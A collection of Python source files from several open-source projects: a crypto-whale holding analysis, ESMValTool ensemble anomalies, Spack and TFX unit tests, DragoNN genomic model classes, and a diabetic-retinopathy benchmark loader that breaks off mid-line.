import sys sys.path.insert(0,'..') from data.whale_data import exchnage_accounts from data.html_helper import check_if_address_name_exists from data.whale_eth_tx_data import * from data.whale_token_tx_data import identify_investor_type_token holding_account = "holding_account" deposit_account = 'deposit_account' withdraw_account = "withdraw_account" in_type = "IN" out_type = "OUT" all_acc_types = dict() for acc in exchnage_accounts: all_acc_types[acc] = exchange_type def update_y_array(X,y,timestamp,amount): target_index = 0 for i in range(len(X)): x_time = X[i] if timestamp < x_time: target_index = i break for i in range(target_index,len(y)): y[i] += amount return y def perform_bfs_on_accounts(out_txs,top_holder_type,acc,m_type='OUT'): print("\t"+m_type) unique_out = set() for out in out_txs: unique_out.add(out[3]) unique_out = list(unique_out)[:5] for out in unique_out: print("\t"+out) if out not in all_acc_types: investor_type = identify_investor_type(out) if investor_type == affliate_type: investor_type = identify_investor_type_token(out) print("\t\t{}".format(investor_type)) else: investor_type = all_acc_types[out] if investor_type == exchange_type: top_holder_type[acc] = deposit_account if m_type == "OUT" else withdraw_account all_acc_types[out] = investor_type if acc not in top_holder_type: top_holder_type[acc] = holding_account return top_holder_type def calculate_holding_amount(X,escape_accounts,txs): top_holder_type = dict() for acc in txs: tx = txs[acc] if acc in escape_accounts: continue #如果当前账户从来没有向外打过token,ignore out_txs = [item for item in tx if item[2] == 'OUT'] if len(out_txs) == 0: print("\tholding account") top_holder_type[acc] = holding_account continue # build all traxe Y: holding_amount, deposit_amount, withdraw_amount amount_trace_y = [0] * len(X) for holder in txs: if holder in escape_accounts: continue if holder not in top_holder_type: print("{} not identified! ".format(holder)) continue holder_type = top_holder_type[holder] holder_txs = txs[holder] print("{} {}".format(holder,holder_type)) for tx in holder_txs: [timestamp,from_a,tx_type,to_a,amount] = tx if holder_type == holding_account: if tx_type == in_type: amount_trace_y = update_y_array(X,amount_trace_y,timestamp,amount) else: amount_trace_y = update_y_array(X,amount_trace_y,timestamp,-amount) return amount_trace_y
esmvaltool/diag_scripts/ensclus/ens_anom.py
yifatdzigan/ESMValTool
148
8321
"""Computation of ensemble anomalies based on a desired value.""" import os import numpy as np from scipy import stats # User-defined packages from read_netcdf import read_iris, save_n_2d_fields from sel_season_area import sel_area, sel_season def ens_anom(filenames, dir_output, name_outputs, varname, numens, season, area, extreme): """Ensemble anomalies. Computation of the ensemble anomalies based on the desired value from the input variable (it can be the percentile, mean, maximum, standard deviation or trend) OUTPUT: NetCDF files of ensemble mean of climatology, selected value and anomaly maps. """ print('The name of the output files will be <variable>_{0}.txt' .format(name_outputs)) print('Number of ensemble members: {0}'.format(numens)) outfiles = [] # Reading the netCDF file of 3Dfield, for all the ensemble members var_ens = [] for ens in range(numens): ifile = filenames[ens] # print('ENSEMBLE MEMBER %s' %ens) var, varunits, lat, lon, dates, _ = read_iris(ifile) # Convertion from kg m-2 s-1 to mm/day if varunits == 'kg m-2 s-1': var = var * 86400 # there are 86400 seconds in a day varunits = 'mm/day' # Selecting a season (DJF,DJFM,NDJFM,JJA) var_season, _ = sel_season(var, dates, season) # Selecting only [latS-latN, lonW-lonE] box region var_area, lat_area, lon_area = sel_area(lat, lon, var_season, area) var_ens.append(var_area) if varunits == 'kg m-2 s-1': print('\nPrecipitation rate units were converted from kg m-2 s-1 ' 'to mm/day') print('The variable is {0} ({1})'.format(varname, varunits)) print('Original var shape: (time x lat x lon)={0}'.format(var.shape)) print('var shape after selecting season {0} and area {1}: ' '(time x lat x lon)={2}'.format(season, area, var_area.shape)) if extreme == 'mean': # Compute the time mean over the entire period, for each ens member varextreme_ens = [np.nanmean(var_ens[i], axis=0) for i in range(numens)] elif len(extreme.split("_")) == 2: # Compute the chosen percentile over the period, for each ens member quant = int(extreme.partition("th")[0]) varextreme_ens = [np.nanpercentile(var_ens[i], quant, axis=0) for i in range(numens)] elif extreme == 'maximum': # Compute the maximum value over the period, for each ensemble member varextreme_ens = [np.nanmax(var_ens[i], axis=0) for i in range(numens)] elif extreme == 'std': # Compute the standard deviation over the period, for each ens member varextreme_ens = [np.nanstd(var_ens[i], axis=0) for i in range(numens)] elif extreme == 'trend': # Compute the linear trend over the period, for each ensemble member trendmap = np.empty((var_ens[0].shape[1], var_ens[0].shape[2])) trendmap_ens = [] for i in range(numens): for jla in range(var_ens[0].shape[1]): for jlo in range(var_ens[0].shape[2]): slope, _, _, _, _ = \ stats.linregress(range(var_ens[0].shape[0]), var_ens[i][:, jla, jlo]) trendmap[jla, jlo] = slope trendmap_ens.append(trendmap.copy()) varextreme_ens = trendmap_ens varextreme_ens_np = np.array(varextreme_ens) print('Anomalies are computed with respect to the {0}'.format(extreme)) # Compute and save the anomalies with respect to the ensemble ens_anomalies = varextreme_ens_np - np.nanmean(varextreme_ens_np, axis=0) varsave = 'ens_anomalies' ofile = os.path.join(dir_output, 'ens_anomalies_{0}.nc' .format(name_outputs)) # print(ofile) print('ens_anomalies shape: (numens x lat x lon)={0}' .format(ens_anomalies.shape)) save_n_2d_fields(lat_area, lon_area, ens_anomalies, varsave, varunits, ofile) outfiles.append(ofile) # Compute and save the climatology vartimemean_ens = [np.mean(var_ens[i], axis=0) for i in range(numens)] ens_climatologies = np.array(vartimemean_ens) varsave = 'ens_climatologies' ofile = os.path.join(dir_output, 'ens_climatologies_{0}.nc' .format(name_outputs)) save_n_2d_fields(lat_area, lon_area, ens_climatologies, varsave, varunits, ofile) outfiles.append(ofile) ens_extreme = varextreme_ens_np varsave = 'ens_extreme' ofile = os.path.join(dir_output, 'ens_extreme_{0}.nc'.format(name_outputs)) save_n_2d_fields(lat_area, lon_area, ens_extreme, varsave, varunits, ofile) outfiles.append(ofile) return outfiles
lib/spack/spack/test/cache_fetch.py
LiamBindle/spack
2,360
8325
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) import os import pytest from llnl.util.filesystem import mkdirp, touch import spack.config from spack.fetch_strategy import CacheURLFetchStrategy, NoCacheError from spack.stage import Stage @pytest.mark.parametrize('_fetch_method', ['curl', 'urllib']) def test_fetch_missing_cache(tmpdir, _fetch_method): """Ensure raise a missing cache file.""" testpath = str(tmpdir) with spack.config.override('config:url_fetch_method', _fetch_method): fetcher = CacheURLFetchStrategy(url='file:///not-a-real-cache-file') with Stage(fetcher, path=testpath): with pytest.raises(NoCacheError, match=r'No cache'): fetcher.fetch() @pytest.mark.parametrize('_fetch_method', ['curl', 'urllib']) def test_fetch(tmpdir, _fetch_method): """Ensure a fetch after expanding is effectively a no-op.""" testpath = str(tmpdir) cache = os.path.join(testpath, 'cache.tar.gz') touch(cache) url = 'file:///{0}'.format(cache) with spack.config.override('config:url_fetch_method', _fetch_method): fetcher = CacheURLFetchStrategy(url=url) with Stage(fetcher, path=testpath) as stage: source_path = stage.source_path mkdirp(source_path) fetcher.fetch()
tfx/orchestration/experimental/core/service_jobs_test.py
BACtaki/tfx
1,813
8349
# Copyright 2021 Google LLC. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for tfx.orchestration.experimental.core.service_jobs.""" from absl.testing.absltest import mock import tensorflow as tf from tfx.orchestration.experimental.core import service_jobs from tfx.orchestration.experimental.core import test_utils class ExceptionHandlingServiceJobManagerWrapperTest(test_utils.TfxTest): def setUp(self): super().setUp() self._mock_service_job_manager = mock.create_autospec( service_jobs.ServiceJobManager, instance=True) self._mock_service_job_manager.ensure_node_services.return_value = ( service_jobs.ServiceStatus.SUCCESS) self._mock_service_job_manager.stop_node_services.return_value = True self._mock_service_job_manager.is_pure_service_node.return_value = True self._mock_service_job_manager.is_mixed_service_node.return_value = False self._wrapper = service_jobs.ExceptionHandlingServiceJobManagerWrapper( self._mock_service_job_manager) def test_calls_forwarded_to_underlying_instance(self): self.assertEqual(service_jobs.ServiceStatus.SUCCESS, self._wrapper.ensure_node_services(mock.Mock(), 'node1')) self.assertTrue(self._wrapper.stop_node_services(mock.Mock(), 'node2')) self.assertTrue(self._wrapper.is_pure_service_node(mock.Mock(), 'node3')) self.assertFalse(self._wrapper.is_mixed_service_node(mock.Mock(), 'node4')) self._mock_service_job_manager.ensure_node_services.assert_called_once_with( mock.ANY, 'node1') self._mock_service_job_manager.stop_node_services.assert_called_once_with( mock.ANY, 'node2') self._mock_service_job_manager.is_pure_service_node.assert_called_once_with( mock.ANY, 'node3') self._mock_service_job_manager.is_mixed_service_node.assert_called_once_with( mock.ANY, 'node4') def test_ensure_node_services_exception_handling(self): self._mock_service_job_manager.ensure_node_services.side_effect = RuntimeError( 'test error') self.assertEqual(service_jobs.ServiceStatus.FAILED, self._wrapper.ensure_node_services(mock.Mock(), 'node1')) self._mock_service_job_manager.ensure_node_services.assert_called_once_with( mock.ANY, 'node1') def test_stop_node_services_exception_handling(self): self._mock_service_job_manager.stop_node_services.side_effect = RuntimeError( 'test error') self.assertFalse(self._wrapper.stop_node_services(mock.Mock(), 'node2')) self._mock_service_job_manager.stop_node_services.assert_called_once_with( mock.ANY, 'node2') if __name__ == '__main__': tf.test.main()
dragonn/models.py
kundajelab/dragonn
251
8350
<gh_stars>100-1000 from __future__ import absolute_import, division, print_function import matplotlib import numpy as np import os import subprocess import sys import tempfile matplotlib.use('pdf') import matplotlib.pyplot as plt from abc import abstractmethod, ABCMeta from dragonn.metrics import ClassificationResult from sklearn.svm import SVC as scikit_SVC from sklearn.tree import DecisionTreeClassifier as scikit_DecisionTree from sklearn.ensemble import RandomForestClassifier from keras.models import load_model from dragonn.runtime_metrics import * from dragonn.custom_losses import * import warnings warnings.filterwarnings('ignore') def load_dragonn_model(model_string): custom_objects={"recall":recall, "sensitivity":recall, "specificity":specificity, "fpr":fpr, "fnr":fnr, "fdr":fdr, "precision":precision, "f1":f1, "spearman_corr":spearman_corr, "ambig_binary_crossentropy":ambig_binary_crossentropy, "ambig_mean_squared_error":ambig_mean_squared_error} model=load_model(model_string,custom_objects=custom_objects) return model class Model(object): __metaclass__ = ABCMeta @abstractmethod def __init__(self, **hyperparameters): pass @abstractmethod def train(self, X, y, validation_data): pass @abstractmethod def predict(self, X): pass def test(self, X, y): return ClassificationResult(y, self.predict(X)) def score(self, X, y, metric): return self.test(X, y)[metric] class SequenceDNN(Model): """ Sequence DNN models. Parameters ---------- seq_length : int, optional length of input sequence. keras_model : instance of keras.models.Sequential, optional seq_length or keras_model must be specified. num_tasks : int, optional number of tasks. Default: 1. num_filters : list[int] | tuple[int] number of convolutional filters in each layer. Default: (15,). conv_width : list[int] | tuple[int] width of each layer's convolutional filters. Default: (15,). pool_width : int width of max pooling after the last layer. Default: 35. L1 : float strength of L1 penalty. dropout : float dropout probability in every convolutional layer. Default: 0. verbose: int Verbosity level during training. Valida values: 0, 1, 2. Returns ------- Compiled DNN model. """ def __init__(self, seq_length=None, keras_model=None, use_RNN=False, num_tasks=1, num_filters=(15, 15, 15), conv_width=(15, 15, 15), pool_width=35, GRU_size=35, TDD_size=15, L1=0, dropout=0.0, num_epochs=100, verbose=1): from keras.models import Sequential from keras.layers.core import ( Activation, Dense, Dropout, Flatten, Permute, Reshape ) from keras.layers.convolutional import Convolution2D, MaxPooling2D from keras.layers.recurrent import GRU from keras.regularizers import l1 self.num_tasks = num_tasks self.num_epochs = num_epochs self.verbose = verbose self.train_metrics = [] self.valid_metrics = [] if keras_model is not None and seq_length is None: self.model = keras_model self.num_tasks = keras_model.layers[-1].output_shape[-1] elif seq_length is not None and keras_model is None: self.model = Sequential() assert len(num_filters) == len(conv_width) for i, (nb_filter, nb_col) in enumerate(zip(num_filters, conv_width)): conv_height = 4 if i == 0 else 1 self.model.add(Convolution2D( nb_filter=nb_filter, nb_row=conv_height, nb_col=nb_col, activation='linear', init='he_normal', input_shape=(1, 4, seq_length), W_regularizer=l1(L1), b_regularizer=l1(L1))) self.model.add(Activation('relu')) self.model.add(Dropout(dropout)) self.model.add(MaxPooling2D(pool_size=(1, pool_width))) if use_RNN: num_max_pool_outputs = self.model.layers[-1].output_shape[-1] self.model.add(Reshape((num_filters[-1], num_max_pool_outputs))) self.model.add(Permute((2, 1))) self.model.add(GRU(GRU_size, return_sequences=True)) self.model.add(TimeDistributedDense(TDD_size, activation='relu')) self.model.add(Flatten()) self.model.add(Dense(output_dim=self.num_tasks)) self.model.add(Activation('sigmoid')) self.model.compile(optimizer='adam', loss='binary_crossentropy') else: raise ValueError("Exactly one of seq_length or keras_model must be specified!") def train(self, X, y, validation_data, early_stopping_metric='Loss', early_stopping_patience=5, save_best_model_to_prefix=None): if y.dtype != bool: assert set(np.unique(y)) == {0, 1} y = y.astype(bool) multitask = y.shape[1] > 1 if not multitask: num_positives = y.sum() num_sequences = len(y) num_negatives = num_sequences - num_positives if self.verbose >= 1: print('Training model (* indicates new best result)...') X_valid, y_valid = validation_data early_stopping_wait = 0 best_metric = np.inf if early_stopping_metric == 'Loss' else -np.inf for epoch in range(1, self.num_epochs + 1): self.model.fit(X, y, batch_size=128, nb_epoch=1, class_weight={True: num_sequences / num_positives, False: num_sequences / num_negatives} if not multitask else None, verbose=self.verbose >= 2) epoch_train_metrics = self.test(X, y) epoch_valid_metrics = self.test(X_valid, y_valid) self.train_metrics.append(epoch_train_metrics) self.valid_metrics.append(epoch_valid_metrics) if self.verbose >= 1: print('Epoch {}:'.format(epoch)) print('Train {}'.format(epoch_train_metrics)) print('Valid {}'.format(epoch_valid_metrics), end='') current_metric = epoch_valid_metrics[early_stopping_metric].mean() if (early_stopping_metric == 'Loss') == (current_metric <= best_metric): if self.verbose >= 1: print(' *') best_metric = current_metric best_epoch = epoch early_stopping_wait = 0 if save_best_model_to_prefix is not None: self.save(save_best_model_to_prefix) else: if self.verbose >= 1: print() if early_stopping_wait >= early_stopping_patience: break early_stopping_wait += 1 if self.verbose >= 1: print('Finished training after {} epochs.'.format(epoch)) if save_best_model_to_prefix is not None: print("The best model's architecture and weights (from epoch {0}) " 'were saved to {1}.arch.json and {1}.weights.h5'.format( best_epoch, save_best_model_to_prefix)) def predict(self, X): return self.model.predict(X, batch_size=128, verbose=False) def get_sequence_filters(self): """ Returns 3D array of 2D sequence filters. """ return self.model.layers[0].get_weights()[0].squeeze(axis=1) @staticmethod def _plot_scores(X, output_directory, peak_width, score_func, score_name): from dragonn.plot import plot_bases_on_ax scores = score_func(X).squeeze(axis=2) # (num_task, num_samples, num_bases, sequence_length) try: os.makedirs(output_directory) except OSError: pass num_tasks = len(scores) for task_index, task_scores in enumerate(scores): for sequence_index, sequence_scores in enumerate(task_scores): # sequence_scores is num_bases x sequence_length basewise_max_sequence_scores = sequence_scores.max(axis=0) plt.clf() figure, (top_axis, bottom_axis) = plt.subplots(2) top_axis.plot(range(1, len(basewise_max_sequence_scores) + 1), basewise_max_sequence_scores) top_axis.set_title('{} scores (motif highlighted)'.format(score_name)) peak_position = basewise_max_sequence_scores.argmax() top_axis.axvspan(peak_position - peak_width, peak_position + peak_width, color='grey', alpha=0.1) peak_sequence_scores = sequence_scores[:, peak_position - peak_width : peak_position + peak_width].T # Set non-max letter_heights to zero letter_heights = np.zeros_like(peak_sequence_scores) letter_heights[np.arange(len(letter_heights)), peak_sequence_scores.argmax(axis=1)] = \ basewise_max_sequence_scores[peak_position - peak_width : peak_position + peak_width] plot_bases_on_ax(letter_heights, bottom_axis) bottom_axis.set_xticklabels(tuple(map( str, np.arange(peak_position - peak_width, peak_position + peak_width + 1)))) bottom_axis.tick_params(axis='x', labelsize='small') plt.xlabel('Position') plt.ylabel('Score') plt.savefig(os.path.join(output_directory, 'sequence_{}{}'.format( sequence_index, '_task_{}'.format(task_index) if num_tasks > 1 else ''))) plt.close() def plot_deeplift(self, X, output_directory, peak_width=10): self._plot_scores(X, output_directory, peak_width, score_func=self.deeplift, score_name='DeepLift') def plot_in_silico_mutagenesis(self, X, output_directory, peak_width=10): self._plot_scores(X, output_directory, peak_width, score_func=self.in_silico_mutagenesis, score_name='ISM') def plot_architecture(self, output_file): from dragonn.visualize_util import plot as plot_keras_model plot_keras_model(self.model, output_file, show_shape=True) def save(self, save_best_model_to_prefix): arch_fname = save_best_model_to_prefix + '.arch.json' weights_fname = save_best_model_to_prefix + '.weights.h5' open(arch_fname, 'w').write(self.model.to_json()) self.model.save_weights(weights_fname, overwrite=True) @staticmethod def load(model_hdf5_fname=None, arch_fname=None, weights_fname=None): if model_hdf5_fname!=None: from keras.models import load_model sequence_dnn=SequenceDNN(keras_model=load_model(model_hdf5_fname)) else: from keras.models import model_from_json model_json_string = open(arch_fname).read() sequence_dnn = SequenceDNN(keras_model=model_from_json(model_json_string)) if weights_fname is not None: sequence_dnn.model.load_weights(weights_fname) return sequence_dnn class MotifScoreRNN(Model): def __init__(self, input_shape, gru_size=10, tdd_size=4): from keras.models import Sequential from keras.layers.core import ( Activation, Dense, Flatten, TimeDistributedDense ) from keras.layers.recurrent import GRU self.model = Sequential() self.model.add(GRU(gru_size, return_sequences=True, input_shape=input_shape)) if tdd_size is not None: self.model.add(TimeDistributedDense(tdd_size)) self.model.add(Flatten()) self.model.add(Dense(1)) self.model.add(Activation('sigmoid')) print('Compiling model...') self.model.compile(optimizer='adam', loss='binary_crossentropy') def train(self, X, y, validation_data): from keras.callbacks import EarlyStopping print('Training model...') multitask = y.shape[1] > 1 if not multitask: num_positives = y.sum() num_sequences = len(y) num_negatives = num_sequences - num_positives self.model.fit( X, y, batch_size=128, nb_epoch=100, validation_data=validation_data, class_weight={True: num_sequences / num_positives, False: num_sequences / num_negatives} if not multitask else None, callbacks=[EarlyStopping(monitor='val_loss', patience=10)], verbose=True) def predict(self, X): return self.model.predict(X, batch_size=128, verbose=False) class gkmSVM(Model): def __init__(self, prefix='./gkmSVM', word_length=11, mismatches=3, C=1, threads=1, cache_memory=100, verbosity=4): self.word_length = word_length self.mismatches = mismatches self.C = C self.threads = threads self.prefix = '_'.join(map(str, (prefix, word_length, mismatches, C))) options_list = zip( ['-l', '-d', '-c', '-T', '-m', '-v'], map(str, (word_length, mismatches, C, threads, cache_memory, verbosity))) self.options = ' '.join([' '.join(option) for option in options_list]) @property def model_file(self): model_fname = '{}.model.txt'.format(self.prefix) return model_fname if os.path.isfile(model_fname) else None @staticmethod def encode_sequence_into_fasta_file(sequence_iterator, ofname): """writes sequences into fasta file """ with open(ofname, "w") as wf: for i, seq in enumerate(sequence_iterator): print('>{}'.format(i), file=wf) print(seq, file=wf) def train(self, X, y, validation_data=None): """ Trains gkm-svm, saves model file. """ y = y.squeeze() pos_sequence = X[y] neg_sequence = X[~y] pos_fname = "%s.pos_seq.fa" % self.prefix neg_fname = "%s.neg_seq.fa" % self.prefix # create temporary fasta files self.encode_sequence_into_fasta_file(pos_sequence, pos_fname) self.encode_sequence_into_fasta_file(neg_sequence, neg_fname) # run command command = ' '.join( ('gkmtrain', self.options, pos_fname, neg_fname, self.prefix)) process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) process.wait() # wait for it to finish # remove fasta files os.system("rm %s" % pos_fname) os.system("rm %s" % neg_fname) def predict(self, X): if self.model_file is None: raise RuntimeError("GkmSvm hasn't been trained!") # write test fasta file test_fname = "%s.test.fa" % self.prefix self.encode_sequence_into_fasta_file(X, test_fname) # test gkmsvm temp_ofp = tempfile.NamedTemporaryFile() threads_option = '-T %s' % (str(self.threads)) command = ' '.join(['gkmpredict', test_fname, self.model_file, temp_ofp.name, threads_option]) process = subprocess.Popen(command, shell=True) process.wait() # wait for it to finish os.system("rm %s" % test_fname) # remove fasta file # get classification results temp_ofp.seek(0) y = np.array([line.split()[-1] for line in temp_ofp], dtype=float) temp_ofp.close() return np.expand_dims(y, 1) class SVC(Model): def __init__(self): self.classifier = scikit_SVC(probability=True, kernel='linear') def train(self, X, y, validation_data=None): self.classifier.fit(X, y) def predict(self, X): return self.classifier.predict_proba(X)[:, 1:] class DecisionTree(Model): def __init__(self): self.classifier = scikit_DecisionTree() def train(self, X, y, validation_data=None): self.classifier.fit(X, y) def predict(self, X): predictions = np.asarray(self.classifier.predict_proba(X))[..., 1] if len(predictions.shape) == 2: # multitask predictions = predictions.T else: # single-task predictions = np.expand_dims(predictions, 1) return predictions class RandomForest(DecisionTree): def __init__(self): self.classifier = RandomForestClassifier(n_estimators=100)
bdlb/diabetic_retinopathy_diagnosis/benchmark.py
Sairam954/bdl-benchmarks
666
8364
# Copyright 2019 BDL Benchmarks Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Diabetic retinopathy diagnosis BDL Benchmark.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import os from typing import Callable from typing import Dict from typing import Optional from typing import Sequence from typing import Text from typing import Tuple from typing import Union import numpy as np import pandas as pd import tensorflow as tf from absl import logging from ..core import transforms from ..core.benchmark import Benchmark from ..core.benchmark import BenchmarkInfo from ..core.benchmark import DataSplits from ..core.constants import DATA_DIR from ..core.levels import Level tfk = tf.keras _DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR = os.path.join( DATA_DIR, "downloads", "manual", "diabetic_retinopathy_diagnosis") class DiabeticRetinopathyDiagnosisBecnhmark(Benchmark): """Diabetic retinopathy diagnosis benchmark class.""" def __init__( self, level: Union[Text, Level], batch_size: int = 64, data_dir: Optional[Text] = None, download_and_prepare: bool = False, ): """Constructs a benchmark object. Args: level: `Level` or `str, downstream task level. batch_size: (optional) `int`, number of datapoints per mini-batch. data_dir: (optional) `str`, path to parent data directory. download_and_prepare: (optional) `bool`, if the data is not available it downloads and preprocesses it. """ self.__level = level if isinstance(level, Level) else Level.from_str(level) try: self.__ds = self.load(level=level, batch_size=batch_size, data_dir=data_dir or DATA_DIR) except AssertionError: if not download_and_prepare: raise else: logging.info( "Data not found, `DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()`" " is now running...") self.download_and_prepare() @classmethod def evaluate( cls, estimator: Callable[[np.ndarray], Tuple[np.ndarray, np.ndarray]], dataset: tf.data.Dataset, output_dir: Optional[Text] = None, name: Optional[Text] = None, ) -> Dict[Text, float]: """Evaluates an `estimator` on the `mode` benchmark dataset. Args: estimator: `lambda x: mu_x, uncertainty_x`, an uncertainty estimation function, which returns `mean_x` and predictive `uncertainty_x`. dataset: `tf.data.Dataset`, on which dataset to performance evaluation. output_dir: (optional) `str`, directory to save figures. name: (optional) `str`, the name of the method. """ import inspect import tqdm import tensorflow_datasets as tfds from sklearn.metrics import roc_auc_score from sklearn.metrics import accuracy_score import matplotlib.pyplot as plt # Containers used for caching performance evaluation y_true = list() y_pred = list() y_uncertainty = list() # Convert to NumPy iterator if necessary ds = dataset if inspect.isgenerator(dataset) else tfds.as_numpy(dataset) for x, y in tqdm.tqdm(ds): # Sample from probabilistic model mean, uncertainty = estimator(x) # Cache predictions y_true.append(y) y_pred.append(mean) y_uncertainty.append(uncertainty) # Use vectorized NumPy containers y_true = np.concatenate(y_true).flatten() y_pred = np.concatenate(y_pred).flatten() y_uncertainty = np.concatenate(y_uncertainty).flatten() fractions = np.asarray([0.5, 0.6, 0.7, 0.8, 0.9, 1.0]) # Metrics for evaluation metrics = zip(["accuracy", "auc"], cls.metrics()) return { metric: cls._evaluate_metric( y_true, y_pred, y_uncertainty, fractions, lambda y_true, y_pred: metric_fn(y_true, y_pred).numpy(), name, ) for (metric, metric_fn) in metrics } @staticmethod def _evaluate_metric( y_true: np.ndarray, y_pred: np.ndarray, y_uncertainty: np.ndarray, fractions: Sequence[float], metric_fn: Callable[[np.ndarray, np.ndarray], float], name=None, ) -> pd.DataFrame: """Evaluate model predictive distribution on `metric_fn` at data retain `fractions`. Args: y_true: `numpy.ndarray`, the ground truth labels, with shape [N]. y_pred: `numpy.ndarray`, the model predictions, with shape [N]. y_uncertainty: `numpy.ndarray`, the model uncertainties, with shape [N]. fractions: `iterable`, the percentages of data to retain for calculating `metric_fn`. metric_fn: `lambda(y_true, y_pred) -> float`, a metric function that provides a score given ground truths and predictions. name: (optional) `str`, the name of the method. Returns: A `pandas.DataFrame` with columns ["retained_data", "mean", "std"], that summarizes the scores at different data retained fractions. """ N = y_true.shape[0] # Sorts indexes by ascending uncertainty I_uncertainties = np.argsort(y_uncertainty) # Score containers mean = np.empty_like(fractions) # TODO(filangel): do bootstrap sampling and estimate standard error std = np.zeros_like(fractions) for i, frac in enumerate(fractions): # Keep only the %-frac of lowest uncertainties I = np.zeros(N, dtype=bool) I[I_uncertainties[:int(N * frac)]] = True mean[i] = metric_fn(y_true[I], y_pred[I]) # Store df = pd.DataFrame(dict(retained_data=fractions, mean=mean, std=std)) df.name = name return df @property def datasets(self) -> tf.data.Dataset: """Pointer to the processed datasets.""" return self.__ds @property def info(self) -> BenchmarkInfo: """Text description of the benchmark.""" return BenchmarkInfo(description="", urls="", setup="", citation="") @property def level(self) -> Level: """The downstream task level.""" return self.__level @staticmethod def loss() -> tfk.losses.Loss: """Loss used for training binary classifiers.""" return tfk.losses.BinaryCrossentropy() @staticmethod def metrics() -> tfk.metrics.Metric: """Evaluation metrics used for monitoring training.""" return [tfk.metrics.BinaryAccuracy(), tfk.metrics.AUC()] @staticmethod def class_weight() -> Sequence[float]: """Class weights used for rebalancing the dataset, by skewing the `loss` accordingly.""" return [1.0, 4.0] @classmethod def load( cls, level: Union[Text, Level] = "realworld", batch_size: int = 64, data_dir: Optional[Text] = None, as_numpy: bool = False, ) -> DataSplits: """Loads the datasets for the benchmark. Args: level: `Level` or `str, downstream task level. batch_size: (optional) `int`, number of datapoints per mini-batch. data_dir: (optional) `str`, path to parent data directory. as_numpy: (optional) `bool`, if True returns python generators with `numpy.ndarray` outputs. Returns: A namedtuple with properties: * train: `tf.data.Dataset`, train dataset. * validation: `tf.data.Dataset`, validation dataset. * test: `tf.data.Dataset`, test dataset. """ import tensorflow_datasets as tfds from .tfds_adapter import DiabeticRetinopathyDiagnosis # Fetch datasets try: ds_train, ds_validation, ds_test = DiabeticRetinopathyDiagnosis( data_dir=data_dir or DATA_DIR, config=level).as_dataset(split=["train", "validation", "test"], shuffle_files=True, batch_size=batch_size) except AssertionError as ae: raise AssertionError( str(ae) + " Run DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()" " first and then retry.") # Parse task level level = level if isinstance(level, Level) else Level.from_str(level) # Dataset tranformations transforms_train, transforms_eval = cls._preprocessors() # Apply transformations ds_train = ds_train.map(transforms_train, num_parallel_calls=tf.data.experimental.AUTOTUNE) ds_validation = ds_validation.map( transforms_eval, num_parallel_calls=tf.data.experimental.AUTOTUNE) ds_test = ds_test.map(transforms_eval, num_parallel_calls=tf.data.experimental.AUTOTUNE) # Prefetches datasets to memory ds_train = ds_train.prefetch(tf.data.experimental.AUTOTUNE) ds_validation = ds_validation.prefetch(tf.data.experimental.AUTOTUNE) ds_test = ds_test.prefetch(tf.data.experimental.AUTOTUNE) if as_numpy: # Convert to NumPy iterators ds_train = tfds.as_numpy(ds_train) ds_validation = tfds.as_numpy(ds_validation) ds_test = tfds.as_numpy(ds_test) return DataSplits(ds_train, ds_validation, ds_test) @classmethod def download_and_prepare(cls, levels=None) -> None: """Downloads dataset from Kaggle, extracts zip files and processes it using `tensorflow_datasets`. Args: levels: (optional) `iterable` of `str`, specifies which levels from {'medium', 'realworld'} to prepare, if None it prepares all the levels. Raises: OSError: if `~/.kaggle/kaggle.json` is not set up. """ # Disable GPU for data download, extraction and preparation import os os.environ["CUDA_VISIBLE_DEVICES"] = "-1" cls._download() # cls._extract() #cls._prepare(levels) @staticmethod def _download() -> None: """Downloads data from Kaggle using `tensorflow_datasets`. Raises: OSError: if `~/.kaggle/kaggle.json` is not set up. """ import subprocess as sp import tensorflow_datasets as tfds # Append `/home/$USER/.local/bin` to path os.environ["PATH"] += ":/home/{}/.local/bin/".format(os.environ["USER"]) # Download all files from Kaggle drd = tfds.download.kaggle.KaggleCompetitionDownloader( "diabetic-retinopathy-detection") try: for dfile in drd.competition_files: drd.download_file(dfile, output_dir=_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR) except sp.CalledProcessError as cpe: raise OSError( str(cpe) + "." + " Make sure you have ~/.kaggle/kaggle.json setup, fetched from the Kaggle website" " https://www.kaggle.com/<username>/account -> 'Create New API Key'." " Also accept the dataset license by going to" " https://www.kaggle.com/c/diabetic-retinopathy-detection/rules" " and look for the button 'I Understand and Accept' (make sure when reloading the" " page that the button does not pop up again).") @staticmethod def _extract() -> None: """Extracts zip files downloaded from Kaggle.""" import glob import tqdm import zipfile import tempfile # Extract train and test original images for split in ["train", "test"]: # Extract "<split>.zip.00*"" files to "<split>" with tempfile.NamedTemporaryFile() as tmp: # Concatenate "<split>.zip.00*" to "<split>.zip" for fname in tqdm.tqdm( sorted( glob.glob( os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR, "{split}.zip.00*".format(split=split))))): # Unzip "<split>.zip" to "<split>" with open(fname, "rb") as ztmp: tmp.write(ztmp.read()) with zipfile.ZipFile(tmp) as zfile: for image in tqdm.tqdm(iterable=zfile.namelist(), total=len(zfile.namelist())): zfile.extract(member=image, path=_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR) # Delete "<split>.zip.00*" files for splitzip in 